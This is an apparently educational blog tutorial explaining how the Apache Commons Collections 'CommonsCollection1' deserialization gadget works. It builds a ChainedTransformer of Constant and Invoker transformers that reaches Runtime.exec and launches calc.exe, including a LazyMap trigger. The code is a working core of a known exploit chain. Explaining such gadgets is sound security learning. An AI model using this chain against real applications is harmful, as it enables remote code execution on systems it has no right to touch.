CommonsCollection1
So Before we start Learning CommonsCollection1 there are certain Concepts we should Learn.
The trnasformer.
In layman language these are functions which takes an input transfomrs it and produces an output.
Few are:
- InvokerTransFormer
- ConstantTransformer
- ChainedTransFormer
We will dicuss how the CommonsCollection1 payload works and we will pop a calculator withour own code file without using the ysoerial.
We will discuss how exactly the serilized data gets created in ysorial in another post.
SO lets start with ConstantTransformer
ConstantTransformer
In case of ConstantTransformer Once it's initialised with something no matter what you send to transform , it always returns the one that it has been initialised with.
Take below code for an example.
ConstantTransformer transformer = new ConstantTransformer("HelloWorld");
System.out.println(transformer.transform(123)); //Outouts HelloWorld and the return type Java.lang.String
InvokerTransFormer
InvokerTransFormer takes 3 arguments
- First One: Name of a method
- 2nd one the type of parameters passed
- The Value you want to the pass to those method
Take below code for an example.
Person pt=new Person()
InvokerTransformer transformer = new InvokerTransformer("nice",new Class[]{String.class},new String[]{"YES"});
System.out.println(transformer.transform(pt)) //Outputs Yes
The above code will find the function on Person Class whose name is nice and it takes one Parameter of string type and the value its going to pass is "YES"
The Person class looks something like below
public class Person {
public String nice(String a){
return a.toUpperCase();
}
}
So the Output of the code will be "YES"
So inshort invokerTransformer is used to invoker certain Method.
It uses Java's Reflection to Invoker Those methods
ChainedTransFormer
This transformer as the name suggest chains multiple transformer.
Meaning it takes the output of the first Transformer and passes it as the argument of the 2nd TransFormer.
So it takes an Input as array of TransFormers
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.HashMap;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
public class testing {
public static void main(String args[]){
Person pt=new Person();
ConstantTransformer tr=new ConstantTransformer(Person.class);
InvokerTransformer newInstanceTransformer = new InvokerTransformer("newInstance",new Class[0],new Object[0]);
InvokerTransformer tr3=new InvokerTransformer("nice",new Class[]{String.class},new String[]{"hi"});
ChainedTransformer ctr=new ChainedTransformer(new Transformer[]{tr,newInstanceTransformer,tr3});
System.out.println(ctr.transform("RANDOM"));
}}
Where constant and instantiate are the name if the Transformers
The transfomr() of ChainedTransformer will take the argument required by the first Transformer of the TransFormer of the TransFormer array in our case it will be ConstantTransformer
So lets get into Payload
public class CommonsCollections1PayloadOnly {
public static void main(String... args) {
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class), //(1)
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
), //(2)
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
), //(3)
new InvokerTransformer("exec",
new Class[]{String.class},
command
) //(4)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("Swagat");
}
}The ideal goal is to execute Runtime.getRuntime().exec(Command)
At [1] we are instntiating the ConstantTransformer with Runtime.class
So no matter what we pass to it's transform() it will rerutn the Runtime.class
At [2] we are invoking the getMethod() via invokerTransformer and passing 2 more things
- A class array of String.class and Class[].class
- An Object Array of "getRuntime" and and blnk object element
At [3] we are invking the "invoke" method and again passing couple of args
Finally at [4] we are invoking the exec() and passing our Command
Now lets Try to understand the above with couple of Questions
Before that lets just simplyfy the above code
ConstantTransformer tr=new ConstantTransformer(Runtime.class);
InvokerTransformer transformer = new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]});
InvokerTransformer tr3=new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]});
InvokerTransformer tr4=new InvokerTransformer("exec",new Class[]{String.class},new String[]{"calc.exe"});
System.out.println(transformer.transform(Runtime.class).getClass().getName());
System.out.println(tr4.transform(tr3.transform(transformer.transform(Runtime.class))));
If you last line we are taking the out of the first Transfromer and passing it as an input for the next transFormer.
This is exactly what chainedTransfromer will do.
Why do we need these?
TO understand the need of all these transformer and the exact sequence , let deep dive in to the TransFormer's code and understand how it works.
InvokerTransFormer
The Below code shows the constuctor of the InvokerTransformer that will get called when class is being initialized.
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}When we call the TransForm Method defined at line 119 It uses Reflection to Invoke The Method Provided By Us.(If this looks foregin to you, i would recommed to Go thorugh Reflection Trainning and then Comback)
This Means Using InvokerTransFormer We can Invoke Any method Present in the Class Path
So can we Invoke Runtime.getRuntime().exec() ?
Answer is Yes, but its not Straight Forward.
So t in Runtime.class the getRuntime() is defined as a static Method.
When we are calling Static Method we canot call it from an object of the class but we have to call it on class meaning className.MethodName(). So in our case we can only do it via Runtiem.getRuntime()
IF we try to create an Object of Runtime() and call the getRuntime() it will thorugh a compile TIme Error
Try Running the Below Code
Runtime rt=new Runtime();
rt.getRuntime().exec("calc.exe");TO solve the Problem we faced Above we need ConstantTransFormer.
Remeber the Property of Constant TransFormer?
Once its instantiated it can not be Changed without the use of Reflection Explicilty.
So that is why we use ConstantTransFormer and passing Runtime.class in there.
But why are we looking for getMethod inside Runtime.class(So the output of the COnstantTransFormer will be input for the InvokerTransFormer, so the class searching is going to happen in the return value of ConstantTransFormer's tansform())?
And why we even need the "invoke"?
Thats a good catch.
Runtime.class doesn't even have the getMethod()
Lets Check what does the ConstantTransFormer's transform() returns
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.HashMap;
import javax.xml.transform.Transformer;
import org.apache.commons.collections.functors.*;
public class testing {
public static void main(String args[]){
ConstantTransformer tr=new ConstantTransformer(Runtime.class);
InvokerTransformer transformer = new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]});
System.out.println(tr.transform("RANDOMESTRING").getClass().getName());
}
}
As you can see the retunr Value is not java.lang.Runtime but its java.lang.Class
Reason is when ever we pass a class to ConstantTransFormer it retunrs the Class.class (This Class Exist on JDK)
Now this class Doesn't have a function called getRuntime() and neither we can call it, however this calss have a function called getMethod() that uses the releection to find a method
And the Input to this function is of type String and varargs of class and hence we have passed String.class and blank Class[] and the values we want is getRuntime()
This method will then use the reflection to find the getRuntime on Runtime.class
Cool , so now its clear why we need these 2 things but what about the invoke?
We need invoke Method cause inorder for us to call the getRuntime() on runtime.class we have call it via what called "calling on the class" due to getRuntime() being static
So when we call the invoke method an instance of Runtime.class gets returned so that we can call the exec() on it
But the class.class doesn't have the Invoke() defined.
That is correct, the InvokerTransformer's transform() method return java.lang.reflect.Method and the invoke() is defined on there
So once we call the invoke Method we get the Runtime.getRuntime()@
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.HashMap;
import javax.xml.transform.Transformer;
import org.apache.commons.collections.functors.*;
public class testing {
public static void main(String args[]){
ConstantTransformer tr=new ConstantTransformer(Runtime.class);
InvokerTransformer transformer = new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]});
InvokerTransformer tr3=new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]});
System.out.println(tr.transform("RANDOMSTRING").getClass().getName());
System.out.println(transformer.transform(Runtime.class).getClass().getName());
System.out.println(tr3.transform(transformer.transform(Runtime.class)).getClass().getName());
}
}
So now we have the java.lang.Runtime and we can now call the exec() on it and that what we are doing at the end
And as always we passing the new Class[]{String.class} and new String[]{"calc.exe"} as this is what exec function needs interms of invokerTransformer
So now if we execute the below code we will have our calculator poped up.
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.HashMap;
import javax.xml.transform.Transformer;
import org.apache.commons.collections.functors.*;
public class testing {
public static void main(String args[]){
ConstantTransformer tr=new ConstantTransformer(Runtime.class);
InvokerTransformer transformer = new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]});
InvokerTransformer tr3=new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]});
InvokerTransformer tr4=new InvokerTransformer("exec",new Class[]{String.class},new String[]{"calc.exe"});
System.out.println(tr.transform("RANDOMSTRING").getClass().getName());
System.out.println(transformer.transform(Runtime.class).getClass().getName());
System.out.println(tr3.transform(transformer.transform(Runtime.class)).getClass().getName());
System.out.println(tr4.transform(tr3.transform(transformer.transform(Runtime.class))).getClass().getName());
}
}
So this is how commons Collection1 Gadget Works
Note: we will read About the LazyMap and the Proxies while we learn on Gadget Builing, For now we will just learn how exactly the paylod works
Thats it for Today.
Thanks For Reading.
Happy Hacking.
You can connect with me at: